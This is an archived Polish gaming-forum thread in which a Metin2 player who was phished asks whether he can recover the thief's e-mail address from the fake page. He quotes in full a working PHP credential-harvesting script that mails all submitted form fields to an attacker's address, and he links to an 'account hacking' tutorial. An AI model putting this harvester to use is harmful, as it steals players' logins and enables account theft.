Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Pytanie]Czy złapie złodzieja ?

Rekomendowane odpowiedzi

Opublikowano

Witam, temat dotyczy gry metin2, wczoraj dałem sie okraść jak dziecko, nie czytałem o tym wcześniej no ;/ eq na postaci było warte conajmiej 300zł, ale mniejsza z tym.. Złodziej podał mi link do stronki powiedział, że mam odpowiedzieć na 5 pytań i dostane za to kamienie on kupi każdy za 40kk.. wiem wiem ... parodia- nabrałem sie na to wiłem na jego stronke (którą on musiał zrobić - podejrzewam, że zrobił lustro strony pozmieniał w indexie) i umieścił w necie poprzez np: cba.. ?? tu sie rodzi pytanie, czy jak zrobie lustro tej jego stronki to moge znaleźć w indexie jego e-mail, bo tam go powinien podać, aby pasy przesłało na meila ?? z góry thx za odp;

Opublikowano

Konto może i odzyskasz ale eq które było na tej postaci raczej już nie będzie (Po co komu konto bez emaila)

Miał tylko passy więc pewnie tylko eq zabrał , nie wiem zabardzo się na takich sprawach (Oszukanych stronach) nie znam .

Tylko piszę jak może być , i stwierdzam fakty .

[Jeżeli coś źle jest napisanę i jakiś user co się na tym zna uzna moją odpowiedź za złą niech nie krytykuje ^.-]

PS: W Index nie ma emaila !

...Przynajmniej w moim indexie...

KANAŁ YOUTUBE KLIK W OBRAZEK

Opublikowano

Rozumiem konto już mam, ale złodziej zakładając tą stronę musiał gdzieś do indexu wrzucić swoj e-mail, aby hasła i nicki były na ten email przesyłane, jak odbierał hasło na emailu to zapewne wchodził na konto i czyścił z eq. Moje pytanie czy ja gdzieś ten jego email znajde? bo to by ułatwiło sprawę ;) on tworząc tą stronke musiał mieć dwa scrypty np: 1.php i 21.php w jednym ze skryptów zmieniał ustawienia : jest to w temacie:

http://www.mpcforum.pl/topic/336760-tut-dl-hakowanie-kont-stron-skryptstrona/ ;) więc jak na mój łeb musi gdzieś być ten jego e-mail... scrypta edytuje tak:

<?php

if (count($_POST))

{

////////// USTAWIENIA //////////

$email = '[email protected]'; // Adres e-mail adresata ------- chodzi mi o ten punkt. Przecież ten e-mail nie rozpływa sie w powietrzu.

$subject = 'Nowe konto laugh.gif'; // Temat listu

$message = 'Wyslano wiadomosc na email.'; // Komunikat

$error = 'Wystąpił błąd podczas wysyłania formularza'; // Komunikat błędu

$charset = 'iso-8859-2'; // Strona kodowa

//////////////////////////////

$head =

"MIME-Version: 1.0\r\n" .

"Content-Type: text/plain; charset=$charset\r\n" .

"Content-Transfer-Encoding: 8bit";

$body = '';

foreach ($_POST as $name => $value)

{

if (is_array($value))

{

for ($i = 0; $i < count($value); $i++)

{

$body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";

}

}

else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";

}

echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;

}

else

{

?>

<form action="?" method="post">

Tutaj umieść wszystkie pola formularza

</form>

<?php

}

?>

sorka za taki spam .

ja tam hackerem nie jestem, ale widze możliwość zdobycia jego meila ;)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...